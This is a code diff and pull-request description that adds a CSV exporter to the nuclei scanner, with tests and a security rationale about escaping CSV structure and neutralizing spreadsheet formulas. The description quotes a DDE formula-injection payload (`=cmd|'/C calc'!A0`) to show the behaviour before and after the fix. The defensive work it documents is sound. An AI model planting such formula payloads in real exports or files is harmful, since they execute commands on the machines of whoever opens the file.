+	require.Equal(t, newlineValue, row[column(t, "description")])
+	require.Equal(t, lf(mixedValue), row[column(t, "curl-command")])
+	require.Equal(t, lf(crlfValue), row[column(t, "matcher-name")])
+	require.Equal(t, "high", row[column(t, "severity")])
+
+	// extracted results and references are newline separated inside their single
+	// quoted cell, so a value that itself contains a comma stays one value
+	require.Equal(t,
+		[]string{commaValue, quoteValue, "line1", "line2"},
+		strings.Split(row[column(t, "extracted-results")], "\n"))
+	require.Equal(t,
+		[]string{commaValue, quoteValue},
+		strings.Split(row[column(t, "reference")], "\n"))
 }
 
-func TestCSVExporterJoinsMultipleCVEs(t *testing.T) {
-	file := filepath.Join(t.TempDir(), "results.csv")
-
-	exporter, err := New(&Options{File: file})
-	require.NoError(t, err)
-
+func TestCSVExporterJoinsMultipleCVEsAndCWEs(t *testing.T) {
 	event := &output.ResultEvent{
 		TemplateID: "multi-cve",
+		Type:       "http",
 		Info: model.Info{
+			Name:           "Multiple CVEs",
 			SeverityHolder: severity.Holder{Severity: severity.Medium},
 			Classification: &model.Classification{
 				CVEID:     stringslice.StringSlice{Value: []string{"CVE-2020-0001", "CVE-2020-0002"}},
+				CWEID:     stringslice.StringSlice{Value: []string{"CWE-79", "CWE-80"}},
 				CVSSScore: 5.5,
 			},
 		},
@@ -143,11 +237,37 @@ func TestCSVExporterJoinsMultipleCVEs(t *testing.T) {
 		Timestamp: time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
 	}
 
+	records := export(t, event)
+	require.Len(t, records, 2)
+	require.Equal(t, "CVE-2020-0001, CVE-2020-0002", records[1][column(t, "cve-id")])
+	require.Equal(t, "CWE-79, CWE-80", records[1][column(t, "cwe-id")])
+	require.Equal(t, "5.5", records[1][column(t, "cvss-score")])
+}
+
+// TestCSVExporterFlushesRowsBeforeClose asserts rows are readable while the
+// scan is still running, rather than only after Close.
+func TestCSVExporterFlushesRowsBeforeClose(t *testing.T) {
+	file := filepath.Join(t.TempDir(), "results.csv")
+
+	exporter, err := New(&Options{File: file})
+	require.NoError(t, err)
+
+	event := &output.ResultEvent{
+		TemplateID: "streamed",
+		Type:       "http",
+		Info: model.Info{
+			Name:           "Streamed Result",
+			SeverityHolder: severity.Holder{Severity: severity.Low},
+		},
+		Host:      "example.com",
+		Matched:   "example.com",
+		Timestamp: time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
+	}
 	require.NoError(t, exporter.Export(event))
-	require.NoError(t, exporter.Close())
 
 	records := readCSV(t, file)
-	require.Len(t, records, 2)
-	require.Equal(t, "CVE-2020-0001, CVE-2020-0002", records[1][4])
-	require.Equal(t, "5.5", records[1][5])
+	require.Len(t, records, 2, "row should be on disk before Close")
+	require.Equal(t, "streamed", records[1][column(t, "template-id")])
+
+	require.NoError(t, exporter.Close())
 }

--- a/pkg/reporting/options.go
+++ b/pkg/reporting/options.go
@@ -2,6 +2,7 @@ package reporting
 
 import (
 	"github.com/projectdiscovery/nuclei/v3/pkg/output"
+	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/csv"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/es"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/jsonexporter"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/jsonl"
@@ -49,6 +50,8 @@ type Options struct {
 	JSONExporter *jsonexporter.Options `yaml:"json"`
 	// JSONLExporter contains configuration options for JSONL Exporter Module
 	JSONLExporter *jsonl.Options `yaml:"jsonl"`
+	// CSVExporter contains configuration options for CSV Exporter Module
+	CSVExporter *csv.Options `yaml:"csv"`
 	// PDFExporter contains configuration options for PDF Exporter Module
 	PDFExporter *pdf.Options `yaml:"pdf"`
 	// MongoDBExporter containers the configuration options for the MongoDB Exporter Module

--- a/pkg/reporting/reporting.go
+++ b/pkg/reporting/reporting.go
@@ -12,6 +12,7 @@ import (
 	"github.com/projectdiscovery/nuclei/v3/pkg/model/types/stringslice"
 	"github.com/projectdiscovery/nuclei/v3/pkg/output"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/dedupe"
+	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/csv"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/es"
 	json_exporter "github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/jsonexporter"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/jsonl"
@@ -149,6 +150,13 @@ func New(options *Options, db string, doNotDedupe bool) (Client, error) {
 		}
 		client.exporters = append(client.exporters, exporter)
 	}
+	if options.CSVExporter != nil {
+		exporter, err := csv.New(options.CSVExporter)
+		if err != nil {
+			return nil, errkit.Wrapf(err, "could not create export client: %v", ErrExportClientCreation)
+		}
+		client.exporters = append(client.exporters, exporter)
+	}
 	if options.PDFExporter != nil {
 		exporter, err := pdf.New(options.PDFExporter)
 		if err != nil {
@@ -229,6 +237,7 @@ func CreateConfigIfNotExists() error {
 		SplunkExporter:        &splunk.Options{},
 		JSONExporter:          &json_exporter.Options{},
 		JSONLExporter:         &jsonl.Options{},
+		CSVExporter:           &csv.Options{},
 		PDFExporter:           &pdf.Options{},
 		MongoDBExporter:       &mongo.Options{},
 	}

--- a/pkg/types/types.go
+++ b/pkg/types/types.go
@@ -248,6 +248,8 @@ type Options struct {
 	JSONExport string
 	// JSONLExport is the file to export JSONL output format to
 	JSONLExport string
+	// CSVExport is the file to export CSV output format to
+	CSVExport string
 	// PDFExport is the file to export PDF output format to
 	PDFExport string
 	// Redact redacts given keys in
@@ -596,6 +598,7 @@ func (options *Options) Copy() *Options {
 		OmitTemplate:                   options.OmitTemplate,
 		JSONExport:                     options.JSONExport,
 		JSONLExport:                    options.JSONLExport,
+		CSVExport:                      options.CSVExport,
 		PDFExport:                      options.PDFExport,
 		Redact:                         options.Redact,
 		EnableProgressBar:              options.EnableProgressBar,


### PR DESCRIPTION
## Proposed changes

Adds a CSV exporter under `pkg/reporting/exporters/csv`, wired into the reporting
module and exposed via a new `-csv-export` / `-ce` flag. It writes one flattened
full row per result, with a stable spreadsheet/GRC-friendly schema:

`template-id, template-name, template-type, severity, host, ip, port, matched-at,
matcher-name, extractor-name, extracted-results, cve-id, cwe-id, cvss-metrics,
cvss-score, description, reference, curl-command, timestamp`

### Summary

Nuclei can export results as JSON, JSONL, SARIF, Markdown and PDF, but not as
CSV. `httpx` and `naabu` already treat CSV as a first-class output mode, so this
is not a new concept in the toolchain. This PR adds a CSV exporter that mirrors
the existing tiny exporter contract (`New` / `Export` / `Close`) and emits a
flat, header-prefixed file ready for direct ingestion by spreadsheets and
ticketing/GRC importers.

### Problem / motivation

Scan output has to leave the terminal. It goes to asset owners, auditors and
GRC/ticketing intake — people who open a file in Excel or Sheets, or feed a CSV
upload form. Requiring `jq` on the consumer side is a real barrier there.

`jq`'s `@csv` quoting is itself correct, so the argument is not that it is
broken. The argument is that nuclei's JSONL has array fields
(`extracted-results`, `info.reference`, `cve-id`, `cwe-id`) which `@csv` refuses
outright, so every consumer hand-rolls a `join(",")` — and a reference URL
containing a comma then becomes indistinguishable from two references. A
built-in exporter makes that separator choice once.

JSON/JSONL remain the lossless formats and stay the right answer for a SIEM/log
shipper path; `request`, `response`, `meta` and `interaction` are deliberately
not projected here.

### Change

- New package `pkg/reporting/exporters/csv` implementing the `Exporter`
  interface (`New`, `Export`, `Close`) using the stdlib `encoding/csv` writer.
- `formatRow` flattens a `*output.ResultEvent` to the column set. Column names
  mirror the JSON/JSONL keys of `output.ResultEvent` one-for-one, and match the
  names httpx uses in its own CSV mode where they overlap (`host`, `port`,
  `timestamp`). `template-name`/`template-type` deviate from bare `name`/`type`,
  which are ambiguous as spreadsheet headers.
- Multi-value separators are chosen per column: `cve-id`/`cwe-id` keep the `", "`
  form used elsewhere in nuclei since identifiers cannot contain a comma;
  `extracted-results` and `reference` are newline separated inside their quoted
  cell, because both carry values that can.
- Rows are flushed as written, so the file is parseable mid-scan.
- Registered in `pkg/reporting/reporting.go` (`New` + `CreateConfigIfNotExists`)
  and added to `pkg/reporting/options.go` as `CSVExporter` (`yaml:"csv"`).
- `CSVExport` field added to `pkg/types/types.go` (and `Options.Copy`).
- CLI flag `-csv-export` / `-ce` added in `cmd/nuclei/main.go`, wired in
  `internal/runner/options.go` with the same CLI-overrides-config precedence as
  the other exporters.

### Security rationale

Two separate escaping concerns, both handled in the exporter.

**Structural injection.** Fields such as `host`, `matched-at` and
`extracted-results` are attacker-influenced — they derive from the scanned
target's input and response surface. Every field is written through
`encoding/csv`, which RFC 4180-quotes any value containing a delimiter, quote or
newline, so adversarial input cannot break out of its cell or forge additional
columns/rows. `TestCSVExporterEscapesStructuralCharacters` pushes commas, double
quotes, LF and CRLF through every attacker-influenced column and asserts the raw
file quotes correctly, the file still parses as exactly two records of
`len(header)` cells, and every value round trips.

**Formula injection (CWE-1236).** `encoding/csv` does not stop a spreadsheet
from *evaluating* a cell. `extracted-results` comes straight from
`OperatorsResult.OutputExtracts`, so a target chooses exactly what lands in that
column — an extracted `=cmd|'/C calc'!A0` executes when the export is opened.
`formatRow` routes every string column through `neutralizeFormula`, which
prefixes a single apostrophe to values starting with `=`, `+`, `-`, `@`, TAB or
CR. Values that parse as a number are left alone so `cvss-score` and `port` stay
numeric and sortable. `extracted-results` and `reference` are neutralized per
element rather than only at the head of the cell, because consumers split those
cells back apart. The transformation is reversible: the original value is the
cell with at most one leading apostrophe removed. Covered by
`TestCSVExporterNeutralizesSpreadsheetFormulas` and the `TestNeutralizeFormula`
table test.

### Testing / validation

Against a fresh clone of `dev` with this branch on top (Go 1.26.2):

- `go build ./...` — exit 0
- `go vet ./...` — exit 0, no output
- `go test ./pkg/reporting/... -count=1` — all packages `ok`, including
  `pkg/reporting/exporters/csv`

End-to-end against a local `python3 -m http.server` with a template whose
extractor captures a DDE payload from the response body, and whose `info` carries
a comma and quotes in `name`, `description` and `reference`. Parsing the export
back with Python's `csv` module gives 2 records of 19 cells each, all values
intact, and the `extracted-results` cell reads:

```
before this fix: =cmd|'/C calc'!A0
after this fix:  '=cmd|'/C calc'!A0
```

## Checklist

- [x] Pull request is created against the `dev` branch
- [x] All checks passed (build, vet, gofmt, unit tests) with my changes
- [x] I have added tests that prove the feature works
- [x] Documentation: flag is self-documenting via `-h`; happy to update README
      usage tables if maintainers prefer it in this PR


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added the `--csv-export` (`-ce`) option to save scan results as CSV files.
  * CSV reports include vulnerability details such as severity, host information, classifications, CVE/CWE identifiers, CVSS metrics, references, and timestamps.
  * CSV exporting can be configured through reporting settings and used alongside existing output options.
  * Protected exported values from unintended spreadsheet formula execution.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
